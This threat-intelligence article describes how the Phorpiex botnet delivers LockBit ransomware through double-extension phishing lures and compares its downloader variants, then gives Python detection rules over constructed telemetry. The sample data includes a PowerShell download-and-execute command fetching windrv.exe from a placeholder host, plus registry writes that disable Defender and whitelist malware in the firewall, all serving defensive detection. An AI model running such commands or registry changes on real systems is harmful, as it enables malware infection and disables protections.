A Dangerous Pair with Phorpiex Botnet Expanding LockBit Ransomware Attacks
The Phorpiex (aka Trik) botnet has gained greater relevance in the threat landscape, and a higher severity rating, because of its newfound role in distributing LockBit 3.0 ransomware. Active since 2010, Phorpiex has historically been associated with malware distribution, spam campaigns, and cryptocurrency mining; its integration with LockBit expands the ransomware's potential impact across industries. The finding, reported by Cybereason analysts Mahadev Joshi and Masakazu Oku, also warns of a streamlined infection process, as "the LockBit downloader variant of Phorpiex downloaded LockBit right away without expanding the infection area within the victim's network." This automation contrasts with traditional ransomware campaigns, which typically rely on human operators to carry out the intrusion before deploying the payload. The speed of infection that Phorpiex enables therefore presents an increased risk, even though only minimal changes have been observed in the botnet's source code since its sale in 2021.
Two delivery variants were reported, both starting with a phishing email that carries a ZIP attachment. The infection then diverges according to the file type inside the ZIP: an SCR file leads to LockBit, while an LNK shortcut file leads to the TWIZT variant of Phorpiex. In the LNK chain the malicious file is disguised as "document.doc.lnk"; opening it invokes CMD, which runs a PowerShell command that downloads "windrv.exe", a TWIZT downloader, into the victim's %userprofile% directory. In the SCR chain the file is disguised as "pic0502024.jpg.scr" and connects to a LockBit-controlled IP address to download the ransomware binary into the %TEMP% folder. Both lures rely on Windows hiding known file extensions by default, so the user sees what looks like a document or image. Cybereason did not observe an active connection to the IP at the time of analysis, but historical intelligence from Proofpoint links it to LockBit.
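The two delivery chains above are easy to express as detection logic. The following Python is an added example (not code from Cybereason or from the article) that runs over a handful of constructed, Sysmon-style process-creation records modelled on the chains described: a double-extension lure (".doc.lnk", ".jpg.scr") being executed, and an explorer.exe -> cmd.exe -> powershell.exe chain whose PowerShell command downloads an executable into the user profile. The sample records, the download URL (a TEST-NET address) and the ZIP name are assumptions made for the example; the command-line detection is a generalization that also catches other download cmdlets, not only the exact command seen in the campaign.

```python
import re

# Constructed process-creation events (pid, ppid, image, command line).
# These are sample inputs written for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # LNK chain: the shortcut's target is cmd.exe, which launches PowerShell.
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell -w hidden -c "iwr http://198.51.100.7/windrv.exe '
                r'-OutFile $env:USERPROFILE\windrv.exe; start $env:USERPROFILE\windrv.exe"'},
    {"pid": 4110, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://198.51.100.7/windrv.exe '
                r'-OutFile $env:USERPROFILE\windrv.exe; start $env:USERPROFILE\windrv.exe"'},
    {"pid": 4120, "ppid": 4110, "image": r"C:\Users\victim\windrv.exe",
     "cmdline": r"C:\Users\victim\windrv.exe"},
    # SCR chain: the lure is run straight out of the extracted ZIP.
    {"pid": 4200, "ppid": 4000,
     "image": r"C:\Users\victim\AppData\Local\Temp\Temp1_invoice.zip\pic0502024.jpg.scr",
     "cmdline": r'"C:\Users\victim\AppData\Local\Temp\Temp1_invoice.zip\pic0502024.jpg.scr"'},
    # Benign noise: an admin running a cmdlet, and a genuine screensaver.
    {"pid": 4300, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -c Get-Process"},
    {"pid": 4310, "ppid": 4300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
    {"pid": 4400, "ppid": 4000, "image": r"C:\Windows\System32\Bubbles.scr",
     "cmdline": "Bubbles.scr /s"},
]

# A "document-looking" extension immediately followed by an executable one.
LURE_RE = re.compile(
    r"\.(?:doc|docx|pdf|jpe?g|png|xlsx?|txt)\.(?:lnk|scr|exe|bat|cmd|js|vbs)$",
    re.IGNORECASE)
# Common PowerShell download primitives (broader than the single cmdlet in the sample).
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer",
    re.IGNORECASE)
# An .exe written directly under the user profile, however the profile path is spelled.
USERPROFILE_DROP_RE = re.compile(
    r"(?:\$env:USERPROFILE|%USERPROFILE%|[A-Za-z]:\\Users\\[^\\\s]+)\\([^\s;]+\.exe)",
    re.IGNORECASE)


def is_double_extension_lure(path):
    """True for names such as document.doc.lnk or pic0502024.jpg.scr."""
    return bool(LURE_RE.search(path))


def find_lure_executions(events):
    """Images that were executed under a double-extension name."""
    return [e["image"] for e in events if is_double_extension_lure(e["image"])]


def find_lnk_download_chains(events):
    """explorer.exe -> cmd.exe -> powershell.exe, where PowerShell downloads an
    executable into the user profile. Returns one hit per PowerShell process."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or not parent["image"].lower().endswith("cmd.exe"):
            continue
        grand = by_pid.get(parent["ppid"])
        if grand is None or not grand["image"].lower().endswith("explorer.exe"):
            continue
        if not DOWNLOAD_RE.search(e["cmdline"]):
            continue
        drop = USERPROFILE_DROP_RE.search(e["cmdline"])
        if not drop:
            continue
        hits.append({"pid": e["pid"], "dropped": drop.group(1), "cmdline": e["cmdline"]})
    return hits


if __name__ == "__main__":
    for image in find_lure_executions(SAMPLE_EVENTS):
        print("double-extension lure executed:", image)
    for hit in find_lnk_download_chains(SAMPLE_EVENTS):
        print("LNK download chain: pid", hit["pid"], "drops", hit["dropped"])
```

The parent-chain check is what keeps the rule quiet: an administrator typing a cmdlet into a cmd.exe-spawned PowerShell (pid 4310 above) matches the ancestry but not the download-and-drop pattern, while Bubbles.scr is a real screensaver and has no document extension in front of its .scr.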
The Phorpiex malware family includes multiple downloader variants, each with distinct behaviors but sharing common traits such as removal of the Zone.Identifier alternate data stream (the mark-of-the-web that would otherwise flag the file as downloaded from the internet). Cybereason analysts found that the LockBit Downloader variant deletes the URL cache, presumably so that a stale cache entry cannot interfere with the download. The TWIZT variant adds a JPEG file check to avoid reinfecting already compromised hosts: "This procedure verifies the machine is a new host to avoid re-infecting it." GandCrab, another Phorpiex-related downloader, modifies the Windows Registry to disable Windows Defender's AntiSpyware feature and adds its own process path to the authorized applications list in the firewall policy. It also performs anti-sandbox checks and obfuscates its execution flow at runtime by dynamically decrypting and replacing the .text section in process memory, so that static, signature-based detection of the on-disk binary fails; the decrypted code is only visible to scanning of the live process.
Additionally, the TWIZT and GandCrab variants establish persistence via the Run registry key, a feature absent from the LockBit Downloader, which is consistent with its download-and-execute-immediately role. The comparison shows variants that share a common downloader core but differ in persistence and defense evasion, and it is this combination of automation, rapid deployment, and evasion that makes the resurgence of Phorpiex a significant security concern: its integration with LockBit could dramatically increase ransomware infections across industries.
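The registry-visible behaviors described in the two paragraphs above (Defender AntiSpyware disabled, the downloader's own path added to the firewall's authorized-applications list, and Run-key persistence) can be triaged from registry-write telemetry. The following Python is an added example, not code from Cybereason or from the article, that classifies constructed Sysmon-style registry-set records and then reports which of the described variants are consistent with what each process wrote. The registry paths used are the standard locations for these settings (assumed here, not quoted from the report); the trait table is a summary of the article's description and covers only registry-observable behaviors, so Zone.Identifier removal, the URL cache deletion and the JPEG check are out of scope for it. The process names other than windrv.exe are placeholders.

```python
# Constructed registry-value-set events (image, key, value name, data).
# Sample input written for this example, not telemetry from the report.
SAMPLE_REG_EVENTS = [
    # TWIZT-style persistence: the dropped downloader registers itself in Run.
    {"image": r"C:\Users\victim\windrv.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Windows Driver", "data": r"C:\Users\victim\windrv.exe"},
    # GandCrab-style defense impairment plus persistence (dropper.exe is a placeholder).
    {"image": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender",
     "value_name": "DisableAntiSpyware", "data": 1},
    {"image": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters"
            r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List",
     "value_name": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "data": r"C:\Users\victim\AppData\Local\Temp\dropper.exe:*:Enabled:dropper"},
    {"image": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "dropper", "data": r"C:\Users\victim\AppData\Local\Temp\dropper.exe"},
    # Benign noise: Explorer saving a folder-view preference.
    {"image": r"C:\Windows\explorer.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value_name": "Hidden", "data": 1},
]

# Registry-observable traits per variant, as described in the article.
VARIANT_TRAITS = {
    "LockBit Downloader": set(),
    "TWIZT": {"run_key_persistence"},
    "GandCrab": {"run_key_persistence", "defender_antispyware_disabled",
                 "firewall_authorized_app", "firewall_authorized_app_self"},
}


def _norm_key(key):
    return (key.lower()
            .replace("hkey_local_machine", "hklm")
            .replace("hkey_current_user", "hkcu")
            .rstrip("\\"))


def classify_registry_event(evt):
    """Tag one registry write, or return None if it is not of interest."""
    key = _norm_key(evt["key"])
    name = evt["value_name"].lower()
    if (key.endswith(r"\policies\microsoft\windows defender")
            and name == "disableantispyware" and str(evt["data"]) == "1"):
        return "defender_antispyware_disabled"
    if (r"\services\sharedaccess\parameters\firewallpolicy" in key
            and key.endswith(r"\authorizedapplications\list")):
        # The value name is the allowed program's path; self-authorization is the tell.
        if name == evt["image"].lower():
            return "firewall_authorized_app_self"
        return "firewall_authorized_app"
    if key.endswith(r"\software\microsoft\windows\currentversion\run") \
            or key.endswith(r"\software\microsoft\windows\currentversion\runonce"):
        return "run_key_persistence"
    return None


def consistent_variants(tags):
    """Variants whose described behavior includes every observed tag."""
    return sorted(v for v, traits in VARIANT_TRAITS.items() if set(tags) <= traits)


def triage(events):
    """Group interesting writes by process image and attribute them."""
    per_image = {}
    for evt in events:
        tag = classify_registry_event(evt)
        if tag is None:
            continue
        per_image.setdefault(evt["image"], set()).add(tag)
    return {image: {"tags": sorted(tags), "variants": consistent_variants(tags)}
            for image, tags in per_image.items()}


if __name__ == "__main__":
    for image, info in triage(SAMPLE_REG_EVENTS).items():
        print(image, info["tags"], "->", info["variants"])
```

A single Run-key write is consistent with either TWIZT or GandCrab, while Defender impairment and self-authorization in the firewall list narrow it to GandCrab; a process that downloads and runs LockBit without touching any of these keys matches the LockBit Downloader's described behavior, which is exactly why Run-key monitoring alone will not see that variant.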